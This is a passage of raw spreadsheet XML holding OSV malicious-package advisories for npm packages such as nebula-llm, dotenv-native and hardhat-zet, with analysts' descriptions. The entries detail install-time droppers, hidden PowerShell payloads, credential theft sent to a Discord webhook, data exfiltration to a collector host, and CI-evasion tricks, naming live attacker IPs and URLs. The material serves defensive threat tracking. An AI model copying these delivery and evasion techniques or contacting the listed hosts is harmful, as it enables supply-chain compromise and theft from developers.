The package is advertised as a chalk+figlet wrapper but index.js contains a top-level IIFE that runs on require. On Windows hosts, it reconstructs the module names 'https', 'os', 'fs', 'path', and 'child_process' and the method name 'spawn' from char-code arrays, hex escapes, and string concatenation to hide the network and execution chain. It then decodes the hardcoded plain-HTTP URL http://104.234.65.75:700/setup.exe and the filename RuntimeBroker.exe (masquerading as a legitimate Windows binary), downloads the payload into the OS temp directory via https.get piped to createWriteStream, and spawns it detached with windowsHide: true and.unref(). Execution is gated to skip environments where CI, SANDBOX, GITHUB_ACTIONS, or TRAVIS are set, evading sandbox and CI analysis. The obfuscation, bare-IP plain-HTTP delivery, RuntimeBroker.exe masquerade, and CI-evasion gate are inconsistent with the package's stated purpose and match an install/require-time Windows dropper.
</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17226</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17227</t>
        </is>
      </c>
      <c r="D397" s="5" t="inlineStr"/>
      <c r="E397" s="5" t="inlineStr"/>
      <c r="F397" s="5" t="inlineStr"/>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-llm</t>
        </is>
      </c>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr"/>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b33da6aef41209f654f8f76cc56074a7b827599f42f941e3917326da1f4d2566)
The npm package nebula-llm@1.0.0 ships a preinstall lifecycle script (preinstall.cjs) that embeds a ~257KB Windows PE binary as a base64+zlib-compressed string literal. On `npm install` on Windows, the script decompresses the blob, writes it to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe — impersonating the legitimate Windows Console Host binary — and spawns it detached with stdio ignored and windowsHide:true, then unrefs the child so it survives the install process. The decoded PE contains a.kntrat section and references github.com/syskiel/kntrat-e and IP 65.87.7.132, consistent with a persistent remote-access implant. Installation therefore executes an opaque author-supplied executable on the installer's host with no user interaction and no purpose related to any documented package function.
</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17227</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17228</t>
        </is>
      </c>
      <c r="D398" s="5" t="inlineStr"/>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="inlineStr"/>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr">
        <is>
          <t>npm:nebulaai-sdk</t>
        </is>
      </c>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr"/>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc906b81107141fbd85dcabf89fd2f5112c4e4a134045c90d6a35abb4b67d16e)
The package's `preinstall.js` contains a base64+zlib-encoded 257 KB Windows PE executable. On `npm install` on Windows, the script decodes the blob and writes it to `%LOCALAPPDATA%\Microsoft\Conhost\conhost.exe` — a path and filename that impersonates a legitimate Windows console host binary — then spawns it via `child_process.spawn` with `detached: true`, `stdio: 'ignore'`, and `windowsHide: true`, so execution is silent and survives the npm process. The decoded PE contains a section named `.kntrat` and references the external host `65.87.7.132` and the repository `github.com/syskiel/kntrat-e`, indicating remote command-and-control functionality (RAT-shaped naming). The package has no legitimate SDK functionality visible; the preinstall hook exists solely to stage and run the embedded executable. Installing this package on a Windows host results in full arbitrary code execution under the installing user, with a masqueraded persistent binary staged under LOCALAPPDATA and a C2 endpoint reachable at 65.87.7.132.
</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17228</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17229</t>
        </is>
      </c>
      <c r="D399" s="5" t="inlineStr"/>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="inlineStr"/>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr">
        <is>
          <t>npm:simple-date-formatter-new-12</t>
        </is>
      </c>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr"/>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd79db99adb8878673dd85db5a29661432808fa8fcc5e3d750b907418df8ae5f)
npm package simple-date-formatter-new-12@1.0.0 declares a postinstall lifecycle script in package.json that runs automatically on `npm install`. The script uses curl to fetch an internal Baidu host (http://bsrc-ssrf.n.baidu-int.com/...), writes the response to /tmp/bsrc.txt, and POSTs the contents to an attacker-controlled interactsh collector at pdxkwzizhzzdpzpgcieqk6d1v7ynqsgfo.oast.fun/bsrc. The package's advertised purpose is a trivial date-formatting wrapper (index.js exports a single formatDate function); the SSRF probe and outbound exfiltration are unrelated to that purpose. The name shape (`simple-date-formatter-new-12`), empty author metadata, and OAST beacon are consistent with a dependency-confusion / typosquat probe designed to detect installation inside a target organization and leak internal network responses reachable from the installer's network position to a third-party collector.
</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17229</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17230</t>
        </is>
      </c>
      <c r="D400" s="5" t="inlineStr"/>
      <c r="E400" s="5" t="inlineStr"/>
      <c r="F400" s="5" t="inlineStr"/>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr">
        <is>
          <t>npm:llm-nebula</t>
        </is>
      </c>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr"/>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0eee293a9973027154eea71635c14e8a4cb2ad8a1e4f80a65399ad874afcb669)
Package presents itself as an LLM SDK (nebula.js exposes a small client stub) but declares `preinstall: node preinstall.cjs` in package.json, and preinstall.cjs is a ~232KB single-line obfuscated blob that runs automatically on `npm install`. The script wraps its body in a `Function(...)` constructor and uses a custom PRNG-based string decoder (TEA/xorshift-style constants 0x9e3779b9 / 0x243f6a88 / 0x6a09e667) over a packed printable-ASCII string plus a hex-int array to reconstruct characters via `String.fromCharCode`, driving a control-flow-flattened switch dispatcher. Node builtins and method names are resolved dynamically at runtime (e.g. `Ooa8zU["Bd5Wj1"]("fs")`) so module ids, filesystem paths, network destinations, and command strings are not visible without executing the decoder. This obfuscation-plus-lifecycle-hook composition is the canonical install-time dropper / RCE shape: the benign-looking library entry serves as a cover story while the hidden preinstall payload runs on any consumer's machine at install time with the user's privileges, capable of arbitrary filesystem, process, and network operations.
</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17230</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17231</t>
        </is>
      </c>
      <c r="D401" s="5" t="inlineStr"/>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="inlineStr"/>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-native</t>
        </is>
      </c>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr"/>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4369c7fa886fc7d315922759932056664863d71157bcdece943fa53339586f03)
Package `dotenv-native` typosquats the popular `dotenv` family (bundled internal manifest name `node-env-buffer`) and executes an attacker-controlled payload on module load. On require, `dist/index.cjs` and the `dot2env` CLI entry `dist/cli.cjs` invoke a `dispatchAnalytics` routine that opens the bundled `dist/stest.jpg`, scans JPEG segments for an APP1/EXIF (0xFFED) marker, extracts the marker contents as a UTF-8 string, writes a `relay_*.vbs` file to a temp directory, and spawns `wscript.exe` detached with `windowsHide:true` to launch `powershell.exe -EncodedCommand &lt;EXIF-derived base64&gt;`. The strings `powershell`, `shell`, `.exe`, `wscript.exe`, and `-EncodedCommand` are split into arrays and joined at runtime to evade static matching. A second artifact `dist/decode.js` is an obfuscator.io-style bundle that base64-decodes an inline blob, RC4-decrypts it with a hardcoded key, base64-decodes again, and passes the result to `new Function(require, module, __filename, __dirname,...)` — a decode-and-eval RCE primitive shipped alongside the main dropper. Both the library entry and the CLI entry carry the loader, so consumption as a dependency or invocation of the `dot2env` bin runs the payload on Windows hosts.
</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17231</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17232</t>
        </is>
      </c>
      <c r="D402" s="5" t="inlineStr"/>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="inlineStr"/>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-native-loader</t>
        </is>
      </c>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr"/>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d289ae71736f05158f45d6636730641e82b5a774bf99bf1b587155d31c73daaa)
package.json declares a postinstall hook that runs index.js on npm install. index.js reads Minecraft launcher credential stores (launcher_accounts.json, launcher_profiles.json, and equivalent files for Prism, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher), extracting Mojang/Microsoft accessTokens, refreshTokens, and clientTokens. It also recursively walks the.minecraft directory reading.json/.txt/.cfg/.properties/.yml/.log files and matches their contents against JWT and Bearer-token regexes. The collected credentials are combined with os.hostname(), os.userInfo().username, and os.platform() and POSTed via HTTPS to a hardcoded Discord webhook (discord.com/api/webhooks/1554065488726990909/...). No functionality matching the package name is present; the sole effect of installing the package is credential theft against the installer.
</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17232</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17233</t>
        </is>
      </c>
      <c r="D403" s="5" t="inlineStr"/>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="inlineStr"/>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-lock</t>
        </is>
      </c>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr"/>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (035a099bd6a60e41f1e1cbc1b70f27fecb9bef3f12d54e016d6991b581fc880f)
The npm package hardhat-lock@2.21.0 publishes itself as a logger/middleware but its identity and contents are inconsistent with that purpose: README badges, LICENSE, index.d.ts and docs/* are copied from the unrelated pino project (maintained by pinojs), while the package name squats the Ethereum-tooling keyword 'hardhat'. index.js unconditionally executes require('./lib/config') at module load, and lib/config.js is a ~4MB obfuscator.io-style single-line file (rotated string array of 23,981 entries, hex-escaped tokens, numeric wrapper decoders mt/mw/M0..M5/K/R/s/G, control-flow flattening, and 40,131 inline decoder replacements confirmed by webcrack) whose top-level IIFE runs the moment any downstream code does require('hardhat-lock'). The combination — impersonation of an established package under a different scope-adjacent name, opaque multi-megabyte obfuscated blob with no plausible logging use, and guaranteed import-time execution — is a supply-chain payload carrier: installing and loading the package places attacker-controlled code inside the consumer's Node.js process with unrestricted access to environment variables, filesystem, and network.
</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17233</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17234</t>
        </is>
      </c>
      <c r="D404" s="5" t="inlineStr"/>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="inlineStr"/>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-zet</t>
        </is>
      </c>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr"/>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (37cd33c0908189c0085fba153be1c42776411968aa5ad652dd7ffdef88b318bc)
hardhat-zet@2.0.1 is published under a name that impersonates the Hardhat Ethereum tooling ecosystem, but its README, type definitions and docs/ tree are copied verbatim from the unrelated `pino` logger project (badges and links point at npmjs.com/package/pino and github.com/pinojs/pino). The exported `middleware` in index.js is a no-op Express middleware and matches neither the `hardhat-zet` name nor the pino README. The package's declared main (index.js) top-level-requires./lib/config, which is not a configuration file but a 4,498,609-byte obfuscator.io-style bundle: a 26,113-entry rotated string array behind two runtime decoders (functions v and F), hex-encoded identifiers, and control-flow flattening. All strings and destination URLs are hidden behind the decoders, so this code runs automatically on any `require('hardhat-zet')` and its behavior is not observable without deobfuscation. Publisher metadata (author 'Robert King &lt;hello@jsonspack.com&gt;', bugs URL https://jsonspack.com/issues) ties to neither the Hardhat nor the pino identity. The combination — ecosystem-typosquat name targeting crypto/Hardhat developers, cover-story README lifted from an unrelated popular package, no-op public API, and a multi-megabyte obfuscated payload auto-executed on import — is the shape of a supply-chain stealer aimed at Ethereum developers.
</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17234</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17235</t>
        </is>
      </c>
      <c r="D405" s="5" t="inlineStr"/>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="inlineStr"/>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr">
        <is>
          <t>npm:items-validator</t>
        </is>
      </c>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr"/>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8e49b1abd7c566b17104c5a2823251df2ca253a0fa509d7c19db1c1942ad13d)
On require, index.js invokes initializeDaemon() at top level, which uses spawn('node', [lib/check-items.js], { detached: true, stdio: 'ignore' }) followed by child.unref() to launch a persistent background process independent of the parent. The daemon HTTP-GETs a JSON payload from the hardcoded endpoint https://game.spawnrealm.com/api/item-realtime?key=abcdef123456 and passes payload.code to `new Function('require', 'module', payload.code)`, executing server-supplied JavaScript inside the installer's Node process with full `require` access. An RSA signature check is performed against a public key bundled in the package (crypto-config.js), so the author controls both the signing key and the verifier and the check provides no independent integrity guarantee. Anyone controlling game.spawnrealm.com — including via DNS or TLS — can run arbitrary code as the installing user for the lifetime of the host process. The package is advertised as a validator library, and this remote-code-loader behavior is undisclosed and unrelated to the stated purpose.
</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17235</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17236</t>
        </is>
      </c>
      <c r="D406" s="5" t="inlineStr"/>
      <c r="E406" s="5" t="inlineStr"/>
      <c r="F406" s="5" t="inlineStr"/>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr">
        <is>
          <t>npm:mini-hardhat</t>
        </is>
      </c>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr"/>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbdfc97da008f90f11ae03963e75237c8bb746cf93f9cdc5da43ba5807ed6c1e)
mini-hardhat@1.1.4 presents itself as a pino-like JSON logger, but its main entry exports a middleware factory that, on instantiation, spawns lib/caller.js as a detached, stdio-ignored, unref'd child process so execution survives the parent. lib/caller.js base64-decodes a hardcoded URL (stored under decoy keys named DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) resolving to https://ipinfo-encrypted-v1.vercel.app/api/auth/f1f097d93c318c92f0c5, POSTs to it via axios, and passes the response body directly to new Function.constructor("require", s)(require), granting the remote endpoint arbitrary code execution inside the consumer's Node.js process with full require access. The fetch is retried up to 5 times. The declared purpose (logger/vulnerability-management document) does not match the shipped code, the destination URL and headers are base64-obfuscated, and the delivery is engineered to persist beyond the parent process — the shape of an intentional remote-code-execution dropper.
</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17236</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17237</t>
        </is>
      </c>
      <c r="D407" s="5" t="inlineStr"/>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="inlineStr"/>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr">
        <is>
          <t>npm:native-env</t>
        </is>
      </c>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr"/>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8e9c612513357181c7e4d504f94a2a8c03de64724e2593217216de8fef4e7166)
native-env@1.0.1 presents itself as a zero-dependency dotenv toolkit but executes attacker-chosen code on Windows the moment the module is required or the bin is run. Both dist/index.cjs and dist/cli.cjs invoke dispatchAnalytics() at module top level. dispatchAnalytics() reads dist/stest.jpg, walks JPEG marker segments, extracts the contents of the APP13 (0xFFED) marker as a hidden string, writes a randomly-named relay_&lt;ts&gt;.vbs into the OS temp directory, and spawns wscript.exe detached (windowsHide:true) to launch powershell.exe -NoProfile -NonInteractive -EncodedCommand with the JPEG-hidden payload; the VBS self-deletes. The bundled dist/stest.jpg (287 KB) is not referenced anywhere else and serves solely as a payload carrier, a deliberate evasion of static scanners that inspect only.js files. dist/decode.js is a separate heavily-obfuscated loader using an obfuscator.io-style string-array dispatcher and RC4 decryption of an embedded base64 blob whose output is executed via new Function('require','module','__filename','__dirname', &lt;decoded&gt;)(...). The published name native-env conflicts with the bundled inner package.json which identifies the artifact as node-env-buffer 2.2.6 and exposes a dot2env CLI referencing DOT2ENV_*/DOTENV_* environment variables, consistent with typosquatting of dotenv-family packages.
</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17237</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17238</t>
        </is>
      </c>
      <c r="D408" s="5" t="inlineStr"/>
      <c r="E408" s="5" t="inlineStr"/>
      <c r="F408" s="5" t="inlineStr"/>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr">
        <is>
          <t>npm:rai6jaisahthaghee5ou-loader-package</t>
        </is>
      </c>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr"/>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6de53fbd264f685e033789fe5929c63f322366219d80707ec419a48a85e253c9)
